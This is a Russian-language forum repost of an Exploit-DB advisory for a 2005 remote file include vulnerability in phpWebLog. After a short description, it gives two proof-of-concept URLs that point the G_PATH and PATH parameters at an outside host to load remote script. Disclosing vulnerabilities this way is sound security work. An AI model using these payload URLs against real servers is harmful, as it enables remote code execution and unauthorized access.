- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 25193
- Проверка EDB
- 
	
		
			- Пройдено
 
- Автор
- FILIP GROSZYNSKI
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- N/A
- Дата публикации
- 2005-03-07
		Код:
	
	source: https://www.securityfocus.com/bid/12747/info
phpWebLog is prone to remote file include vulnerability. This issue is due to a failure of the application to properly sanitize user-supplied input prior to using it in a PHP 'include_once()' function call.
An attacker may leverage this issue to execute arbitrary server-side script code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.
http://www.example.com/phpWebLog/include/init.inc.php?G_PATH=http://www.example.org/
http://www.example.com/phpWebLog/backend/addons/links/index.php?PATH=http://www.example.org/- Источник
- www.exploit-db.com
 
 
		